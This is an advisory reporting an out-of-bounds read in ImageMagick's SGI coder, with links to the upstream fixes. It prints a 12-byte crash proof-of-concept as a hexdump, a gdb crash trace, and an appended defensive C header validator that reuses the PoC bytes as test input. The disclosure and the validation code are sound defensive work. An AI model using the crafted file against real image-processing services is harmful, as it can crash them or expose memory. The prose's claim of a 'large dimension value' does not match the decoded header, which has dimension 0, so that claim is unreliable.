ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability
Hi. This is PeiwenChen of Tencent's Xuanwu Lab and RayZhong of Tencent's Keen Lab. During our research we found an out-of-bounds read vulnerability in ImageMagick's SGI coder. When ImageMagick identifies an SGI image, a crafted SGI file with a large dimension value in its header makes the reader loop a number of times controlled by that value and read past the end of the pixel buffer, which is an out-of-bounds read. The attached PoC is only 12 bytes long, far short of the 512-byte SGI header (hexdump prints little-endian 16-bit words, so the big-endian header fields decode to magic 0x01DA, storage 0, 1 byte per channel, dimension 0, xsize 0xFEFF, ysize 2, zsize 4). The crash is a load in IsPixelMonochrome through r15 = 0x765000, which the vmmap below shows is the end of the heap mapping, so the fault is a read, not a write.

The ImageMagick team has fixed the vulnerability we reported.

Upstream fixes:
https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d
https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127

Debian bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776

Attached is a proof of concept and backtrace.

$ hexdump PoC.sgi
0000000 da01 0100 0000 fffe 0200 0400
000000c

$ convert PoC.sgi
Program received signal SIGSEGV, Segmentation fault.
[------------------------registers------------------------]
RAX: 0x0
RBX: 0x1
RCX: 0xf939
RDX: 0x6031b0 --> 0x0
RSI: 0x7ffff7fe8090 --> 0x1
RDI: 0x7ffff7dcef98 --> 0x1
RBP: 0xdfbc
RSP: 0x7fffffff5e60 --> 0xffffffff54535254
RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss xmm0,DWORD PTR [r15+rax*4])
R8 : 0x744850 --> 0x0
R9 : 0x1
R10: 0x69a000 --> 0x0
R11: 0x1
R12: 0x641600 --> 0x600000000
R13: 0x6535f0 --> 0x1700000001
R14: 0x603178 --> 0x6031b0 --> 0x0
R15: 0x765000 <== end address of heap
[---------------------------code---------------------------]
   0x7ffff74eae7d <IdentifyImageGray+781>: inc BYTE PTR [rdx+rcx*1]
   0x7ffff74eae80 <IdentifyImageGray+784>: mov DWORD PTR [rax],0x5177
   0x7ffff74eae86 <IdentifyImageGray+790>: mov rax,QWORD PTR [rsp+0x30]
=> 0x7ffff74eae8b <IdentifyImageGray+795>: movss xmm0,DWORD PTR [r15+rax*4]
   0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff74eae96 <IdentifyImageGray+806>: mov rax,QWORD PTR [rsp+0x28]
   0x7ffff74eae9b <IdentifyImageGray+811>: movss xmm4,DWORD PTR [r15+rax*4]
   0x7ffff74eaea1 <IdentifyImageGray+817>: subss xmm0,xmm4
[---------------------------stack---------------------------]
00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254
01:0008|     0x7fffffff5e68 --> 0x0
02:0016|     0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001
03:0024|     0x7fffffff5e78 --> 0x614160 --> 0x1a9
04:0032|     0x7fffffff5e80 --> 0x0
05:0040|     0x7fffffff5e88 --> 0x1
06:0048|     0x7fffffff5e90 --> 0x0
07:0056|     0x7fffffff5e98 --> 0xfeff
[-----------------------------------------------------------]
Legend: stack, code, data, heap, rodata, value
Stopped reason: SIGSEGV
0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
561       red_green=(MagickRealType) pixel[image->channel_map[RedPixelChannel].offset]-
gdb-peda$ bt
#0  0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
#1  IdentifyImageGray (image=<optimized out>, exception=<optimized out>) at MagickCore/attribute.c:683
#2  0x00007ffff74ebb7a in IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821
#3  0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized out>, exception=0x614160) at MagickCore/identify.c:494
#4  0x00007ffff71024a6 in IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336
#5  0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/mogrify.c:183
#6  0x0000000000401cae in MagickMain (argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145
#7  main (argc=<optimized out>, argv=<optimized out>, argv@entry=0x7fffffffeb48) at utilities/magick.c:176
#8  0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291
#9  0x0000000000401519 in _start ()
gdb-peda$ vmmap
Start              End                Perm  Name
0x00400000         0x00403000         r-xp  /usr/local/bin/magick
0x00602000         0x00603000         r--p  /usr/local/bin/magick
0x00603000         0x00604000         rw-p  /usr/local/bin/magick
0x00604000         0x00765000         rw-p  [heap]
0x00007ffff553f000 0x00007ffff5817000 r--p  /usr/lib/locale/locale-archive

Regards,
Peiwen Chen
Tencent's Xuanwu Lab
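The check a reader of this format needs, as an added example that is not code from the advisory, from ImageMagick or from the upstream fixes: a validator for the SGI header that refuses a file before any pixel buffer is sized from its fields. The 512-byte header, big-endian fields and magic 0x01DA are properties of the SGI format; the limits MAX_DIMENSION and MAX_PIXEL_BYTES, the status codes and the function names are this example's own assumptions, and the 12 PoC bytes are reconstructed from the hexdump above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fixed properties of the SGI (IRIS RGB) format: a 512-byte header that
   starts with the big-endian magic 0x01DA. */
#define SGI_HEADER_SIZE 512u
#define SGI_MAGIC       0x01DAu

/* Hypothetical limits for this example. A real reader would take them from
   its resource policy (ImageMagick's -limit width/height/memory) instead. */
#define MAX_DIMENSION   16384u
#define MAX_PIXEL_BYTES (256u * 1024u * 1024u)

enum sgi_status {
    SGI_OK = 0,
    SGI_ERR_TRUNCATED_HEADER,  /* fewer than 512 bytes: the PoC case */
    SGI_ERR_BAD_MAGIC,
    SGI_ERR_BAD_STORAGE,
    SGI_ERR_BAD_BPC,
    SGI_ERR_BAD_DIMENSION,
    SGI_ERR_ZERO_SIZE,
    SGI_ERR_TOO_LARGE,
    SGI_ERR_TRUNCATED_DATA     /* verbatim body shorter than the header implies */
};

struct sgi_header {
    uint16_t magic;
    uint8_t  storage;            /* 0 = verbatim, 1 = RLE */
    uint8_t  bytes_per_channel;  /* 1 or 2 */
    uint16_t dimension;          /* 1, 2 or 3 */
    uint16_t columns, rows, depth;
};

static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)(((unsigned)p[0] << 8) | p[1]);
}

/* Validate the header before anything is allocated from it. On SGI_OK,
   *pixel_bytes is the decoded image size, the only number a row loop may trust. */
enum sgi_status sgi_parse_header(const uint8_t *buf, size_t len,
                                 struct sgi_header *h, uint64_t *pixel_bytes)
{
    if (len < SGI_HEADER_SIZE)
        return SGI_ERR_TRUNCATED_HEADER;
    h->magic             = be16(buf + 0);
    h->storage           = buf[2];
    h->bytes_per_channel = buf[3];
    h->dimension         = be16(buf + 4);
    h->columns           = be16(buf + 6);
    h->rows              = be16(buf + 8);
    h->depth             = be16(buf + 10);
    if (h->magic != SGI_MAGIC)
        return SGI_ERR_BAD_MAGIC;
    if (h->storage > 1)
        return SGI_ERR_BAD_STORAGE;
    if (h->bytes_per_channel != 1 && h->bytes_per_channel != 2)
        return SGI_ERR_BAD_BPC;
    if (h->dimension < 1 || h->dimension > 3)
        return SGI_ERR_BAD_DIMENSION;
    /* 1-D: one scanline of one channel; 2-D: one channel; only 3-D uses zsize. */
    if (h->dimension == 1) h->rows = 1;
    if (h->dimension <= 2) h->depth = 1;
    if (h->columns == 0 || h->rows == 0 || h->depth == 0)
        return SGI_ERR_ZERO_SIZE;
    if (h->columns > MAX_DIMENSION || h->rows > MAX_DIMENSION || h->depth > 4)
        return SGI_ERR_TOO_LARGE;
    /* Every factor is <= 65535, so this product cannot overflow a uint64_t. */
    *pixel_bytes = (uint64_t)h->columns * h->rows * h->depth * h->bytes_per_channel;
    if (*pixel_bytes > MAX_PIXEL_BYTES)
        return SGI_ERR_TOO_LARGE;
    /* Verbatim storage has a known body length, so a short file is rejected
       here rather than discovered one EOF at a time inside the row loop.
       RLE data has to be bounds-checked per run instead. */
    if (h->storage == 0 && (uint64_t)(len - SGI_HEADER_SIZE) < *pixel_bytes)
        return SGI_ERR_TRUNCATED_DATA;
    return SGI_OK;
}

/* Constructed input: the 12 bytes of PoC.sgi, reconstructed from the hexdump
   (hexdump prints little-endian 16-bit words, so "da01" is the bytes 01 da). */
static const uint8_t poc_bytes[12] = {
    0x01, 0xda,   /* magic 0x01DA */
    0x00, 0x01,   /* verbatim storage, 1 byte per channel */
    0x00, 0x00,   /* dimension 0 */
    0xfe, 0xff,   /* xsize 0xFEFF = 65279 */
    0x00, 0x02,   /* ysize 2 */
    0x00, 0x04    /* zsize 4 */
};

/* Case 1: the PoC exactly as shipped, 12 bytes. */
enum sgi_status sgi_check_poc(void)
{
    struct sgi_header h; uint64_t n = 0;
    return sgi_parse_header(poc_bytes, sizeof poc_bytes, &h, &n);
}

/* Case 2: the same fields padded to a full header with dimension 3, so the
   size limits fire instead of the length check. */
enum sgi_status sgi_check_padded_poc(void)
{
    uint8_t buf[SGI_HEADER_SIZE] = {0};
    struct sgi_header h; uint64_t n = 0;
    memcpy(buf, poc_bytes, sizeof poc_bytes);
    buf[5] = 3;
    return sgi_parse_header(buf, sizeof buf, &h, &n);
}

/* Case 3: a well-formed 2x2, single-channel verbatim image with its 4 pixel bytes. */
static enum sgi_status parse_valid(uint64_t *n)
{
    uint8_t buf[SGI_HEADER_SIZE + 4] = {0};
    struct sgi_header h;
    buf[0] = 0x01; buf[1] = 0xda;        /* magic */
    buf[3] = 1;                          /* 1 byte per channel */
    buf[5] = 2;                          /* dimension 2 */
    buf[7] = 2; buf[9] = 2; buf[11] = 1; /* xsize 2, ysize 2, zsize 1 */
    return sgi_parse_header(buf, sizeof buf, &h, n);
}
enum sgi_status sgi_check_valid(void) { uint64_t n = 0; return parse_valid(&n); }
uint64_t sgi_valid_pixel_bytes(void)   { uint64_t n = 0; parse_valid(&n); return n; }

int main(void)
{
    printf("PoC.sgi as shipped:        status %d\n", sgi_check_poc());
    printf("PoC header padded to 512:  status %d\n", sgi_check_padded_poc());
    printf("valid 2x2x1 image:         status %d, %llu pixel bytes\n",
           sgi_check_valid(), (unsigned long long)sgi_valid_pixel_bytes());
    return 0;
}
```

The order of the checks is the point: the file length is tested against the fixed header size before any field is read, the dimensions are bounded before they are multiplied, and for verbatim storage the body length is compared with the computed size before a single scanline is consumed, so a header that promises more pixels than the file holds never reaches a loop that indexes a buffer by those dimensions.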